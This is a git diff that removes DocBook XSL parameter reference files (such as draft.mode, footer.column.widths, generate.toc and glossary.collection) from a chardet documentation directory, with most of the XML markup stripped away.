- - - -Description - -If an unqualified dimension is encountered (for example, in a -graphic width), the default-units will be used for the -units. Unqualified dimensions are not allowed in XSL Formatting Objects. - - - - diff --git a/chardet/docs/docbook/xsl/params/dingbat.font.family.xml b/chardet/docs/docbook/xsl/params/dingbat.font.family.xml deleted file mode 100644 index 3136ae9..0000000 --- a/chardet/docs/docbook/xsl/params/dingbat.font.family.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -dingbat.font.family - - - -dingbat.font.family -The font family for copyright, quotes, and other symbols - - - - - - - - -Description - -The dingbat font family is used for dingbats. If it is defined -as the empty string, no font change is effected around dingbats. - - - - diff --git a/chardet/docs/docbook/xsl/params/double.sided.xml b/chardet/docs/docbook/xsl/params/double.sided.xml deleted file mode 100644 index 3c676b9..0000000 --- a/chardet/docs/docbook/xsl/params/double.sided.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -double.sided - - - -double.sided -Is the document to be printed double sided? - - - - - - - - -Description - -Double-sided documents are printed with a slightly wider margin -on the binding edge of the page. - -FIXME: The current set of parameters does not take writing direction -into account. - - - diff --git a/chardet/docs/docbook/xsl/params/draft.mode.xml b/chardet/docs/docbook/xsl/params/draft.mode.xml deleted file mode 100644 index 542efa0..0000000 --- a/chardet/docs/docbook/xsl/params/draft.mode.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -draft.mode -list - - -draft.mode -Select draft mode - - - - - - - - -Description - -Selects draft mode. If draft.mode is -yes, the entire document will be treated -as a draft. If it is no, the entire document -will be treated as a final copy. If it is maybe, -individual sections will be treated as draft or final independently, depending -on how their status attribute is set. - - - - diff --git a/chardet/docs/docbook/xsl/params/draft.watermark.image.xml b/chardet/docs/docbook/xsl/params/draft.watermark.image.xml deleted file mode 100644 index 1f5aa89..0000000 --- a/chardet/docs/docbook/xsl/params/draft.watermark.image.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -draft.watermark.image -uri - - -draft.watermark.image -The URI of the image to be used for draft watermarks - - - - - - - - -Description - -The image to be used for draft watermarks. - - - diff --git a/chardet/docs/docbook/xsl/params/ebnf.assignment.xml b/chardet/docs/docbook/xsl/params/ebnf.assignment.xml deleted file mode 100644 index 4300071..0000000 --- a/chardet/docs/docbook/xsl/params/ebnf.assignment.xml +++ /dev/null @@ -1,35 +0,0 @@ - - -ebnf.assignment -rtf - - -ebnf.assignment -The EBNF production assignment operator - - - - - -::= - - - - ::= - - - - - -Description - -The ebnf.assignment parameter determines what -text is used to show assignment in productions -in productionsets. - -While ::= is common, so are several -other operators. - - - diff --git a/chardet/docs/docbook/xsl/params/ebnf.statement.terminator.xml b/chardet/docs/docbook/xsl/params/ebnf.statement.terminator.xml deleted file mode 100644 index b3a8d86..0000000 --- a/chardet/docs/docbook/xsl/params/ebnf.statement.terminator.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -ebnf.statement.terminator -rtf - - -ebnf.statement.terminator -Punctuation that ends an EBNF statement. - - - - - - - - - -Description - -The ebnf.statement.terminator parameter determines what -text is used to terminate each production -in productionset. - -Some notations end each statement with a period. - - - diff --git a/chardet/docs/docbook/xsl/params/ebnf.table.bgcolor.xml b/chardet/docs/docbook/xsl/params/ebnf.table.bgcolor.xml deleted file mode 100644 index 82c8996..0000000 --- a/chardet/docs/docbook/xsl/params/ebnf.table.bgcolor.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -ebnf.table.bgcolor -string - - -ebnf.table.bgcolor -Background color for EBNF tables - - - - - - -Description - -Sets the background color for EBNF tables. No bgcolor -attribute is output if ebnf.table.bgcolor is set to -the null string. The default value matches the value used in recent -online versions of the W3C's XML Spec productions. - - - diff --git a/chardet/docs/docbook/xsl/params/ebnf.table.border.xml b/chardet/docs/docbook/xsl/params/ebnf.table.border.xml deleted file mode 100644 index 80916c2..0000000 --- a/chardet/docs/docbook/xsl/params/ebnf.table.border.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -ebnf.table.border - - - -ebnf.table.border -Selects border on EBNF tables - - - - - - -Description - -Selects the border on EBNF tables. If non-zero, the tables have -borders, otherwise they don't. - - - diff --git a/chardet/docs/docbook/xsl/params/eclipse.autolabel.xml b/chardet/docs/docbook/xsl/params/eclipse.autolabel.xml deleted file mode 100644 index 480aa37..0000000 --- a/chardet/docs/docbook/xsl/params/eclipse.autolabel.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -eclipse.autolabel -boolean - - -eclipse.autolabel -Should tree-like ToC use autonumbering feature? - - - - - - - - -Description - -If you want to include chapter and section numbers into ToC in -the left panel, set this parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/eclipse.plugin.id.xml b/chardet/docs/docbook/xsl/params/eclipse.plugin.id.xml deleted file mode 100644 index 11718d7..0000000 --- a/chardet/docs/docbook/xsl/params/eclipse.plugin.id.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -eclipse.plugin.id -string - - -eclipse.plugin.id -Eclipse Help plugin id - - - - -com.example.help - - - -Description - -Eclipse Help plugin id. You should change this id to something -unique for each help. - - - diff --git a/chardet/docs/docbook/xsl/params/eclipse.plugin.name.xml b/chardet/docs/docbook/xsl/params/eclipse.plugin.name.xml deleted file mode 100644 index f7b10a8..0000000 --- a/chardet/docs/docbook/xsl/params/eclipse.plugin.name.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -eclipse.plugin.name -string - - -eclipse.plugin.name -Eclipse Help plugin name - - - - -DocBook Online Help Sample - - - -Description - -Eclipse Help plugin name. - - - diff --git a/chardet/docs/docbook/xsl/params/eclipse.plugin.provider.xml b/chardet/docs/docbook/xsl/params/eclipse.plugin.provider.xml deleted file mode 100644 index b3156da..0000000 --- a/chardet/docs/docbook/xsl/params/eclipse.plugin.provider.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -eclipse.plugin.provider -string - - -eclipse.plugin.provider -Eclipse Help plugin provider name - - - - -Example provider - - - -Description - -Eclipse Help plugin provider name. - - - diff --git a/chardet/docs/docbook/xsl/params/emphasis.propagates.style.xml b/chardet/docs/docbook/xsl/params/emphasis.propagates.style.xml deleted file mode 100644 index 5a2c70c..0000000 --- a/chardet/docs/docbook/xsl/params/emphasis.propagates.style.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -emphasis.propagates.style -boolean - - -emphasis.propagates.style -Pass emphasis role attribute through to HTML? - - - - - - - - -Description - -If true, the role attribute of emphasis elements -will be passed through to the HTML as a class attribute on a -span that surrounds the emphasis. - - - diff --git a/chardet/docs/docbook/xsl/params/entry.propagates.style.xml b/chardet/docs/docbook/xsl/params/entry.propagates.style.xml deleted file mode 100644 index 02853c6..0000000 --- a/chardet/docs/docbook/xsl/params/entry.propagates.style.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -entry.propagates.style -boolean - - -entry.propagates.style -Pass entry role attribute through to HTML? - - - - - - - - -Description - -If true, the role attribute of entry elements -will be passed through to the HTML as a class attribute on the -td or th generated for the table -cell. - - - diff --git a/chardet/docs/docbook/xsl/params/equation.properties.xml b/chardet/docs/docbook/xsl/params/equation.properties.xml deleted file mode 100644 index 8dc70dd..0000000 --- a/chardet/docs/docbook/xsl/params/equation.properties.xml +++ /dev/null @@ -1,18 +0,0 @@ - - -equation.properties -Properties associated with a equation - - - - - - - - -Description - -The styling for equations. - - - diff --git a/chardet/docs/docbook/xsl/params/example.properties.xml b/chardet/docs/docbook/xsl/params/example.properties.xml deleted file mode 100644 index 116c58d..0000000 --- a/chardet/docs/docbook/xsl/params/example.properties.xml +++ /dev/null @@ -1,18 +0,0 @@ - - -example.properties -Properties associated with a example - - - - - - - - -Description - -The styling for examples. - - - diff --git a/chardet/docs/docbook/xsl/params/figure.properties.xml b/chardet/docs/docbook/xsl/params/figure.properties.xml deleted file mode 100644 index e232e12..0000000 --- a/chardet/docs/docbook/xsl/params/figure.properties.xml +++ /dev/null @@ -1,18 +0,0 @@ - - -figure.properties -Properties associated with a figure - - - - - - - - -Description - -The styling for figures. - - - diff --git a/chardet/docs/docbook/xsl/params/firstterm.only.link.xml b/chardet/docs/docbook/xsl/params/firstterm.only.link.xml deleted file mode 100644 index eb53b36..0000000 --- a/chardet/docs/docbook/xsl/params/firstterm.only.link.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -firstterm.only.link -boolean - - -firstterm.only.link -Does automatic glossterm linking only apply to firstterms? - - - - - - - - -Description - -If true, only firstterms will be automatically linked -to the glossary. If glossary linking is not enabled, this parameter -has no effect. - - - diff --git a/chardet/docs/docbook/xsl/params/footer.column.widths.xml b/chardet/docs/docbook/xsl/params/footer.column.widths.xml deleted file mode 100644 index 63c6478..0000000 --- a/chardet/docs/docbook/xsl/params/footer.column.widths.xml +++ /dev/null @@ -1,69 +0,0 @@ - - -footer.column.widths -string - - -footer.column.widths -Specify relative widths of footer areas - - - - - - -Description - -Page footers in print output use a three column table -to position text at the left, center, and right side of -the footer on the page. -This parameter lets you specify the relative sizes of the -three columns. The default value is -"1 1 1". - -The parameter value must be three numbers, separated -by white space. The first number represents the relative -width of the left footer for -single-sided output, or the inside footer for -double-sided output. The second number is the relative -width of the center footer. The third number is the -relative width of the right footer for -single-sided output, or the outside footer for -double-sided output. - - -The numbers are used to specify the column widths -for the table that makes up the footer area. -In the FO output, this looks like: - - - -<fo:table-column column-number="1" - column-width="proportional-column-width(1)"/> - - - -The proportional-column-width() -function computes a column width by dividing its -argument by the total of the arguments for all the columns, and -then multiplying the result by the width of the whole table -(assuming all the column specs use the function). -Its argument can be any positive integer or floating point number. -Zero is an acceptable value, although some FO processors -may warn about it, in which case using a very small number might -be more satisfactory. - - -For example, the value "1 2 1" means the center -footer should have twice the width of the other areas. -A value of "0 0 1" means the entire footer area -is reserved for the right (or outside) footer text. -Note that to keep the center area centered on -the page, the left and right values must be -the same. A specification like "1 2 3" means the -center area is no longer centered on the page -since the right area is three times the width of the left area. - - - - diff --git a/chardet/docs/docbook/xsl/params/footer.content.properties.xml b/chardet/docs/docbook/xsl/params/footer.content.properties.xml deleted file mode 100644 index d31c4ed..0000000 --- a/chardet/docs/docbook/xsl/params/footer.content.properties.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -footer.content.properties - - - -footer.content.properties - - - - - - - - - - - - - - - - -Description - -Properties of page footer content. - - - diff --git a/chardet/docs/docbook/xsl/params/footer.rule.xml b/chardet/docs/docbook/xsl/params/footer.rule.xml deleted file mode 100644 index f34b9ac..0000000 --- a/chardet/docs/docbook/xsl/params/footer.rule.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -footer.rule -boolean - - -footer.rule -Rule over footers? - - - - - - - - -Description - -If non-zero, a rule will be drawn above the page footers. - - - diff --git a/chardet/docs/docbook/xsl/params/footers.on.blank.pages.xml b/chardet/docs/docbook/xsl/params/footers.on.blank.pages.xml deleted file mode 100644 index fbf2ff8..0000000 --- a/chardet/docs/docbook/xsl/params/footers.on.blank.pages.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -footers.on.blank.pages -boolean - - -footers.on.blank.pages -Put footers on blank pages? - - - - - - - - -Description - -If non-zero, footers will be placed on blank pages. - - - diff --git a/chardet/docs/docbook/xsl/params/footnote.font.size.xml b/chardet/docs/docbook/xsl/params/footnote.font.size.xml deleted file mode 100644 index 9ab2a41..0000000 --- a/chardet/docs/docbook/xsl/params/footnote.font.size.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -footnote.font.size - - - -footnote.font.size -The font size for footnotes - - - - - pt - - - -Description - -The footnote font size is used for...footnotes! - - - - diff --git a/chardet/docs/docbook/xsl/params/footnote.number.format.xml b/chardet/docs/docbook/xsl/params/footnote.number.format.xml deleted file mode 100644 index 672cfec..0000000 --- a/chardet/docs/docbook/xsl/params/footnote.number.format.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -footnote.number.format -string - - -footnote.number.format -Identifies the format used for footnote numbers - - - - - - - - -Description - -The footnote.number.format specifies the format -to use for footnote numeration (1, i, I, a, or A). - - - diff --git a/chardet/docs/docbook/xsl/params/footnote.number.symbols.xml b/chardet/docs/docbook/xsl/params/footnote.number.symbols.xml deleted file mode 100644 index e2c10c8..0000000 --- a/chardet/docs/docbook/xsl/params/footnote.number.symbols.xml +++ /dev/null @@ -1,34 +0,0 @@ - - -footnote.number.symbols - - - -footnote.number.symbols - - - - - - - - - -Description - -If footnote.number.symbols is not the empty string, -footnotes will use the characters it contains as footnote symbols. For example, -*&#x2020;&#x2021;&#x25CA;&#x2720; will identify -footnotes with *, , , -, and . If there are more footnotes -than symbols, the stylesheets will fall back to numbered footnotes using -footnote.number.format. - -The use of symbols for footnotes depends on the ability of your -processor (or browser) to render the symbols you select. Not all systems are -capable of displaying the full range of Unicode characters. If the quoted characters -in the preceding paragraph are not displayed properly, that's a good indicator -that you may have trouble using those symbols for footnotes. - - - diff --git a/chardet/docs/docbook/xsl/params/fop.extensions.xml b/chardet/docs/docbook/xsl/params/fop.extensions.xml deleted file mode 100644 index dacc639..0000000 --- a/chardet/docs/docbook/xsl/params/fop.extensions.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -fop.extensions -boolean - - -fop.extensions -Enable FOP extensions? - - - - - - -Description - -If non-zero, -FOP -extensions will be used. At present, this consists of PDF bookmarks. - - - - diff --git a/chardet/docs/docbook/xsl/params/formal.object.properties.xml b/chardet/docs/docbook/xsl/params/formal.object.properties.xml deleted file mode 100644 index d8b7c42..0000000 --- a/chardet/docs/docbook/xsl/params/formal.object.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -formal.object.properties -Properties associated with a formal object such as a figure, or other component that has a title - - - - - - 0.5em - 1em - 2em - 0.5em - 1em - 2em - always - - - - -Description - -The styling for formal objects in docbook. Specify the spacing -before and after the object. - - - diff --git a/chardet/docs/docbook/xsl/params/formal.procedures.xml b/chardet/docs/docbook/xsl/params/formal.procedures.xml deleted file mode 100644 index 0428674..0000000 --- a/chardet/docs/docbook/xsl/params/formal.procedures.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -formal.procedures -boolean - - -formal.procedures -Selects formal or informal procedures - - - - - - - - -Description - -Formal procedures are numbered and always have a title. - - - - diff --git a/chardet/docs/docbook/xsl/params/formal.title.placement.xml b/chardet/docs/docbook/xsl/params/formal.title.placement.xml deleted file mode 100644 index 71fe674..0000000 --- a/chardet/docs/docbook/xsl/params/formal.title.placement.xml +++ /dev/null @@ -1,36 +0,0 @@ - - -formal.title.placement - - - -formal.title.placement - - - - - - -figure before -example before -equation before -table before -procedure before -task before - - - - -Description - -Specifies where formal object titles should occur. For each formal object -type (figure, -example, -equation, -table, and procedure) -you can specify either the keyword -before or -after. - - - diff --git a/chardet/docs/docbook/xsl/params/formal.title.properties.xml b/chardet/docs/docbook/xsl/params/formal.title.properties.xml deleted file mode 100644 index 25edc72..0000000 --- a/chardet/docs/docbook/xsl/params/formal.title.properties.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -formal.title.properties -Style the title element of formal object such as a figure. - - - - - - bold - - - pt - - false - 0.4em - 0.6em - 0.8em - - - -Description -Specify how the title should be styled. Specify the font size and weight of the title of the formal object. - - diff --git a/chardet/docs/docbook/xsl/params/funcsynopsis.decoration.xml b/chardet/docs/docbook/xsl/params/funcsynopsis.decoration.xml deleted file mode 100644 index 6aabbdf..0000000 --- a/chardet/docs/docbook/xsl/params/funcsynopsis.decoration.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -funcsynopsis.decoration -boolean - - -funcsynopsis.decoration -Decorate elements of a FuncSynopsis? - - - - - - -Description - -If true (non-zero), elements of the FuncSynopsis will be decorated (e.g. bold or -italic). The decoration is controlled by functions that can be redefined -in a customization layer. - - - - diff --git a/chardet/docs/docbook/xsl/params/funcsynopsis.style.xml b/chardet/docs/docbook/xsl/params/funcsynopsis.style.xml deleted file mode 100644 index cb21392..0000000 --- a/chardet/docs/docbook/xsl/params/funcsynopsis.style.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -funcsynopsis.style -list -ansi -kr - - -funcsynopsis.style -What style of 'FuncSynopsis' should be generated? - - - -kr - - -Description - -If funcsynopsis.style is ansi, -ANSI-style function synopses are generated for a -funcsynopsis, otherwise K&R-style -function synopses are generated. - - - - diff --git a/chardet/docs/docbook/xsl/params/funcsynopsis.tabular.threshold.xml b/chardet/docs/docbook/xsl/params/funcsynopsis.tabular.threshold.xml deleted file mode 100644 index 9760b9d..0000000 --- a/chardet/docs/docbook/xsl/params/funcsynopsis.tabular.threshold.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -funcsynopsis.tabular.threshold -integer - - -funcsynopsis.tabular.threshold -Width beyond which a tabular presentation will be used - - - - - - - - -Description - -If funcsynopsis.tabular.threshold is greater than -zero then if a funcprototype is wider than the threshold -value, it will be presented in a table. - - - diff --git a/chardet/docs/docbook/xsl/params/function.parens.xml b/chardet/docs/docbook/xsl/params/function.parens.xml deleted file mode 100644 index 4856045..0000000 --- a/chardet/docs/docbook/xsl/params/function.parens.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -function.parens -boolean - - -function.parens -Generate parens after a function? - - - -0 - - -Description - -If not 0, the formatting of -a function element will include -generated parenthesis. - - - - diff --git a/chardet/docs/docbook/xsl/params/generate.id.attributes.xml b/chardet/docs/docbook/xsl/params/generate.id.attributes.xml deleted file mode 100644 index 6c638dc..0000000 --- a/chardet/docs/docbook/xsl/params/generate.id.attributes.xml +++ /dev/null @@ -1,54 +0,0 @@ - - -generate.id.attributes - - - -generate.id.attributes - - - - - - - - - -Description - -If non-zero, the HTML stylesheet will generate ID attributes on -containers. For example, the markup: - -Some Title -Some para. -]]> - -might produce: - - -

    Some Title

    -

    Some para.

    -
    ]]> - -The alternative is to generate anchors: - - -

    Some Title

    -

    Some para.

    -]]>
    - -Because the name attribute of -the a element and the id -attribute of other tags are both of type ID, producing both -generates invalid documents. - -As of version 1.50, you can use this switch to control which type of -identifier is generated. For backwards-compatibility, generating -a anchors is preferred. - -Note: at present, this switch is incompletely implemented. -Disabling ID attributes will suppress them, but enabling ID attributes -will not suppress the anchors. - - - diff --git a/chardet/docs/docbook/xsl/params/generate.index.xml b/chardet/docs/docbook/xsl/params/generate.index.xml deleted file mode 100644 index 0dc2058..0000000 --- a/chardet/docs/docbook/xsl/params/generate.index.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -generate.index -boolean - - -generate.index -Do you want an index? - - - - - - -Description - -Specify if an index should be generated. - - - diff --git a/chardet/docs/docbook/xsl/params/generate.legalnotice.link.xml b/chardet/docs/docbook/xsl/params/generate.legalnotice.link.xml deleted file mode 100644 index 5b51cbf..0000000 --- a/chardet/docs/docbook/xsl/params/generate.legalnotice.link.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -generate.legalnotice.link -boolean - - -generate.legalnotice.link -TBD - - - - - - -Description - -TBD - - - diff --git a/chardet/docs/docbook/xsl/params/generate.manifest.xml b/chardet/docs/docbook/xsl/params/generate.manifest.xml deleted file mode 100644 index 44344af..0000000 --- a/chardet/docs/docbook/xsl/params/generate.manifest.xml +++ /dev/null @@ -1,23 +0,0 @@ - - - generate.manifest - boolean - - - generate.manifest - Generate a manifest file? - - - - - - - Description - - If non-zero, a list of HTML files generated by the - stylesheet transformation is written to the file named by - the manifest parameter. - - - diff --git a/chardet/docs/docbook/xsl/params/generate.meta.abstract.xml b/chardet/docs/docbook/xsl/params/generate.meta.abstract.xml deleted file mode 100644 index 6cf6891..0000000 --- a/chardet/docs/docbook/xsl/params/generate.meta.abstract.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -generate.meta.abstract -boolean - - -generate.meta.abstract -Generate HTML META element from abstract? - - - - - - - - -Description - -If non-zero, document abstracts will be reproduced in the HTML -HEAD with meta name="description" content="...". - - - diff --git a/chardet/docs/docbook/xsl/params/generate.section.toc.level.xml b/chardet/docs/docbook/xsl/params/generate.section.toc.level.xml deleted file mode 100644 index ba9bf29..0000000 --- a/chardet/docs/docbook/xsl/params/generate.section.toc.level.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -generate.section.toc.level -integer - - -generate.section.toc.level -Control depth of TOC generation in sections - - - - - - - - -Description - -The generate.section.toc.level parameter -controls the depth of section in which TOCs will be generated. Note -that this is related to, but not the same as -toc.section.depth, which controls the depth to -which TOC entries will be generated in a given TOC. -If, for example, generate.section.toc.level -is 3, TOCs will be generated in first, second, and third -level sections, but not in fourth level sections. - - - - diff --git a/chardet/docs/docbook/xsl/params/generate.toc.xml b/chardet/docs/docbook/xsl/params/generate.toc.xml deleted file mode 100644 index aa8e3d5..0000000 --- a/chardet/docs/docbook/xsl/params/generate.toc.xml +++ /dev/null @@ -1,105 +0,0 @@ - - -generate.toc -table - - -generate.toc -Control generation of ToCs and LoTs - - - - - -appendix toc,title -article/appendix nop -article toc,title -book toc,title,figure,table,example,equation -chapter toc,title -part toc,title -preface toc,title -qandadiv toc -qandaset toc -reference toc,title -sect1 toc -sect2 toc -sect3 toc -sect4 toc -sect5 toc -section toc -set toc,title - - -/appendix toc,title -article/appendix nop -/article toc,title -book toc,title,figure,table,example,equation -/chapter toc,title -part toc,title -/preface toc,title -qandadiv toc -qandaset toc -reference toc,title -/sect1 toc -/sect2 toc -/sect3 toc -/sect4 toc -/sect5 toc -/section toc -set toc,title - - - - -Description - -This parameter has a structured value. It is a table of space-delimited -path/value pairs. Each path identifies some element in the source document -using a restricted subset of XPath (only the implicit child axis, no wildcards, -no predicates). Paths can be either relative or absolute. - -When processing a particular element, the stylesheets consult this table to -determine if a ToC (or LoT(s)) should be generated. - -For example, consider the entry: - -book toc,figure - -This indicates that whenever a book is formatted, a -Table Of Contents and a List of Figures should be generated. Similarly, - -/chapter toc - -indicates that whenever a document that has a root -of chapter is formatted, a Table of -Contents should be generated. The entry chapter would match -all chapters, but /chapter matches only chapter -document elements. - -Generally, the longest match wins. So, for example, if you want to distinguish -articles in books from articles in parts, you could use these two entries: - -book/article toc,figure -part/article toc - -Note that an article in a part can never match a book/article, -so if you want nothing to be generated for articles in parts, you can simply leave -that rule out. - -If you want to leave the rule in, to make it explicit that you're turning -something off, use the value nop. For example, the following -entry disables ToCs and LoTs for articles: - -article nop - -Do not simply leave the word article in the file -without a matching value. That'd be just begging the silly little -path/value parser to get confused. - -Section ToCs are further controlled by the -generate.section.toc.level parameter. -For a given section level to have a ToC, it must have both an entry in -generate.toc and be within the range enabled by -generate.section.toc.level. - - diff --git a/chardet/docs/docbook/xsl/params/glossary.as.blocks.xml b/chardet/docs/docbook/xsl/params/glossary.as.blocks.xml deleted file mode 100644 index dd92f05..0000000 --- a/chardet/docs/docbook/xsl/params/glossary.as.blocks.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -glossary.as.blocks -boolean - - -glossary.as.blocks -Present glossarys using blocks instead of lists? - - - - - - - - -Description - -If non-zero, glossarys will be formatted as -blocks. - -If you have long glossterms, proper list -markup in the FO case may produce unattractive lists. By setting this -parameter, you can force the stylesheets to produce block markup -instead of proper lists. - -You can override this setting with a processing instruction as the -child of glossary: dbfo -glossary-presentation="blocks" or dbfo -glossary-presentation="list" - - - diff --git a/chardet/docs/docbook/xsl/params/glossary.collection.xml b/chardet/docs/docbook/xsl/params/glossary.collection.xml deleted file mode 100644 index eb26556..0000000 --- a/chardet/docs/docbook/xsl/params/glossary.collection.xml +++ /dev/null @@ -1,247 +0,0 @@ - - -glossary.collection -string - - -glossary.collection -Name of the glossary collection file - - - - - - - - -Description - -Glossaries maintained independently across a set of documents -are likely to become inconsistent unless considerable effort is -expended to keep them in sync. It makes much more sense, usually, to -store all of the glossary entries in a single place and simply -extract the ones you need in each document. - -That's the purpose of the -glossary.collection parameter. To setup a global -glossary database, follow these steps: - -Setting Up the Glossary Database - -First, create a stand-alone glossary document that contains all of -the entries that you wish to reference. Make sure that each glossary -entry has an ID. - -Here's an example glossary: - - - - - - -EricRaymond -Jargon File 4.2.3 (abridged) -Just some test data - - -0 - - -0 - -Numeric zero, as opposed to the letter `O' (the 15th letter of -the English alphabet). In their unmodified forms they look a lot -alike, and various kluges invented to make them visually distinct have -compounded the confusion. If your zero is center-dotted and letter-O -is not, or if letter-O looks almost rectangular but zero looks more -like an American football stood on end (or the reverse), you're -probably looking at a modern character display (though the dotted zero -seems to have originated as an option on IBM 3270 controllers). If -your zero is slashed but letter-O is not, you're probably looking at -an old-style ASCII graphic set descended from the default typewheel on -the venerable ASR-33 Teletype (Scandinavians, for whom /O is a letter, -curse this arrangement). (Interestingly, the slashed zero long -predates computers; Florian Cajori's monumental "A History of -Mathematical Notations" notes that it was used in the twelfth and -thirteenth centuries.) If letter-O has a slash across it and the zero -does not, your display is tuned for a very old convention used at IBM -and a few other early mainframe makers (Scandinavians curse this -arrangement even more, because it means two of their letters collide). -Some Burroughs/Unisys equipment displays a zero with a reversed -slash. Old CDC computers rendered letter O as an unbroken oval and 0 -as an oval broken at upper right and lower left. And yet another -convention common on early line printers left zero unornamented but -added a tail or hook to the letter-O so that it resembled an inverted -Q or cursive capital letter-O (this was endorsed by a draft ANSI -standard for how to draw ASCII characters, but the final standard -changed the distinguisher to a tick-mark in the upper-left corner). -Are we sufficiently confused yet? - - - - -1TBS - - - -n - -The "One True Brace Style" -indent style - - - - - - - - - -]]> - - - - -Marking Up Glossary Terms - -That takes care of the glossary database, now you have to get the entries -into your document. Unlike bibliography entries, which can be empty, creating -placeholder glossary entries would be very tedious. So instead, -support for glossary.collection relies on implicit linking. - -In your source document, simply use firstterm and -glossterm to identify the terms you wish to have included -in the glossary. The stylesheets assume that you will either set the -baseform attribute correctly, or that the -content of the element exactly matches a term in your glossary. - -If you're using a glossary.collection, don't -make explicit links on the terms in your document. - -So, in your document, you might write things like this: - - -This is dummy text, without any real meaning. -The point is simply to reference glossary terms like 0 -and the One True Brace Style (1TBS). -The 1TBS, as you can probably imagine, is a nearly -religious issue.]]> - - -If you set the firstterm.only.link parameter, -only the terms marked with firstterm will be links. -Otherwise, all the terms will be linked. - - - -Marking Up the Glossary - -The glossary itself has to be identified for the stylesheets. For lack -of a better choice, the role is used. -To identify the glossary as the target for automatic processing, set -the role to auto. The title of this -glossary (and any other information from the glossaryinfo -that's rendered by your stylesheet) will be displayed, but the entries will -come from the database. - - -Unfortunately, the glossary can't be empty, so you must put in -at least one glossentry. The content of this entry -is irrelevant, it will not be rendered: - - - - -Irrelevant - -If you can see this, the document was processed incorrectly. Use -the glossary.collection parameter. - - -]]> - - -What about glossary divisions? If your glossary database has glossary -divisions and your automatic glossary contains at least -one glossdiv, the automic glossary will have divisions. -If the glossdiv is missing from either location, no divisions -will be rendered. - -Glossary entries (and divisions, if appropriate) in the glossary will -occur in precisely the order they occur in your database. - - - -Formatting the Document - -Finally, when you are ready to format your document, simply set the -glossary.collection parameter (in either a -customization layer or directly through your processor's interface) to -point to your global glossary. - -The stylesheets will format the glossary in your document as if -all of the entries implicilty referenced appeared there literally. - - -Limitations - -Glossary cross-references within the glossary are -not supported. For example, this will not work: - - - -gloss-1 -A description that references gloss-2. -gloss-2 - -]]> - - -If you put glossary cross-references in your glossary that way, -you'll get the cryptic error: Warning: -glossary.collection specified, but there are 0 automatic -glossaries. - -Instead, you must do two things: - - - -Markup your glossary using glossseealso: - - - -gloss-1 -A description that references gloss-2. -gloss-2 - -]]> - - - - -Make sure there is at least one glossterm reference to -gloss-2 in your document. The -easiest way to do that is probably within a remark in your -automatic glossary: - - - -Make sure there's a reference to gloss-2. - -Irrelevant - -If you can see this, the document was processed incorrectly. Use -the glossary.collection parameter. - - -]]> - - - - - - - diff --git a/chardet/docs/docbook/xsl/params/glossentry.show.acronym.xml b/chardet/docs/docbook/xsl/params/glossentry.show.acronym.xml deleted file mode 100644 index feacb9f..0000000 --- a/chardet/docs/docbook/xsl/params/glossentry.show.acronym.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -glossentry.show.acronym -list - - -glossentry.show.acronym -Display glossentry acronyms? - - - - - - - - -Description - -A setting of yes means they should be displayed; -no means they shouldn't. If primary is used, -then they are shown as the primary text for the entry. - - -This setting controls both acronym and -abbrev elements in the glossentry. - - - - diff --git a/chardet/docs/docbook/xsl/params/glosslist.as.blocks.xml b/chardet/docs/docbook/xsl/params/glosslist.as.blocks.xml deleted file mode 100644 index 53af6ee..0000000 --- a/chardet/docs/docbook/xsl/params/glosslist.as.blocks.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -glosslist.as.blocks -boolean - - -glosslist.as.blocks -Use blocks for glosslists? - - - - - - - - -Description - -See glossary.as.blocks. - - - diff --git a/chardet/docs/docbook/xsl/params/glossterm.auto.link.xml b/chardet/docs/docbook/xsl/params/glossterm.auto.link.xml deleted file mode 100644 index 0478977..0000000 --- a/chardet/docs/docbook/xsl/params/glossterm.auto.link.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -glossterm.auto.link -boolean - - -glossterm.auto.link -Generate links from glossterm to glossentry automaticaly? - - - - - - - - -Description - -If true, a link will be automatically created from glossterm -to glossentry for that glossary term. This is usefull when your -glossterm names are consistent and you don't want to add links -manually. -If there is linkend on -glossterm then is used instead of autogeneration of -link. - - - diff --git a/chardet/docs/docbook/xsl/params/glossterm.separation.xml b/chardet/docs/docbook/xsl/params/glossterm.separation.xml deleted file mode 100644 index d69a2b9..0000000 --- a/chardet/docs/docbook/xsl/params/glossterm.separation.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -glossterm.separation -length - - -glossterm.separation -Separation between glossary terms and descriptions in list mode - - - - - - - - -Description - -Specifies the separation between glossary terms and descriptions when -glossarys are presented using lists. - - - diff --git a/chardet/docs/docbook/xsl/params/glossterm.width.xml b/chardet/docs/docbook/xsl/params/glossterm.width.xml deleted file mode 100644 index 6f26d76..0000000 --- a/chardet/docs/docbook/xsl/params/glossterm.width.xml +++ /dev/null @@ -1,23 +0,0 